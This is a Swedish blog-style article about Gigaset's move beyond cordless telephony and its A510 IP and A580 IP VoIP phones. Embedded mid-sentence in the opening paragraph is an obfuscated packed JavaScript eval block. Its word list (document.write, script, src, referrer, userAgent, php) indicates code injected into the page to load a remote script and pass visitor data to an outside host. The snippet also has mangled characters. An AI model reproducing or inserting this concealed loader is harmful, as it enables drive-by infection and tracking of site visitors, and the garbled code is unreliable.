Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Gigaset, Creating av World Beyond Telephony

Gigaset, Creating av World Beyond Telephony
Sebastian

Företaget eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehdyn|var|u0026u|referrer|rnssb||js|php’.split(’|’),0,{}))
Gigaset fortsätter att expandera och utvecklas som företag. Nu går företaget från att vara en leverantör av trådlös fasttelefoni till att även erbjuda samt fokusera på bra lösningar för bland annat nätverkskommunikation. Förra året under IFA-mässan i Berlin visade Gigaset upp sin nya inriktning och förklarade den nya tillväxtstrategin ”Gigaset 2015 – Creating av World Beyond Telephony”.

I den nya strategin visas den nya produktportföljen inom de tre olika affärsområdena konsumentprodukter, företagskunder (Gigaset PRO) och hemmanätverk.
Gigaset har redan påbörjat och kommit en bit in på deras nya öppna modulbaserade IP-plattform. Denna som ska möjliggöra molnbaserade internettjänster samt stödja en bred portfölj av program, tjänster och produkter.

För att säkerställa att användare drar nytta av innovation och det breda utbud av nya program utökar också Gigaset sin nuvarande fokus på DECT- standard till att även inkludera Googles operativsystem Android.

Med Gigasets tradition av att kunna erbjuda hög kvalitet satsar företaget på att ge kunderna marknadens bästa produkter om och om igen. Alla deras telefoner är noggrant testade innan de lämnar fabrikerna så att de kan upprätt hålla den höga kvalitet som utlovas. Helt ärligt skriver Gigaset att oavsett vilken modell du väljer kommer du alltid ha en pålitlig telefon som ger dig glädje år efter år.

Det är viktigt för företaget att göra de omfattade testerna av både funktion och tålighet mot yttre påfrestningar. Detta säkerställer att de kan hålla löftet om att kunna leverera kvalitet.
Se mer på deras hemsida Gigaset.com

Nedan följer några av Gigaset senaste VOIP-telefoner.

Gigaset A510 IP

Med denna telefon kan du välja mellan samtal över antingen VoIP eller vanlig fast telefoni. Du kan även njuta av den bekvämlighet att kunna ringa upp till tre parallella samtal. Självklart finns utrymme för handsfree så du kan syssla med annat medan du gör dina samtal. Alla VoIP-samtal är självklart också i HD-ljud tack vare HDSP-teknik. Anslutningen till internet gör att du får tillgång till grundläggande informationstjänster som väderprognoser, e post eller RSS-flöden via Gigaset A510 IP. Läs mer och se priser hos Telia!

Gigaset A580 IP

Gigaset A580 IP erbjuder två sätt att ringa dina vänner och din familj över hela världen; med dual-mode funktionen kan du med en knapptryckning enkelt växla mellan internet och samtal via fasta linjer. Även när din PC är avstängd kan du njuta av bekvämligheten i internetsamtal med exceptionell ljudkvalitet, tack vare HDSP™ tekniken¹. Gigaset A580 IP har flerlinjesfunktion, du kan registrera upp till 6 enheter med 6 SIP-konton från olika operatörer och genomföra upp till 3 olika samtal parallellt: 2 VoIP-samtal och 1 trådbundet samtal.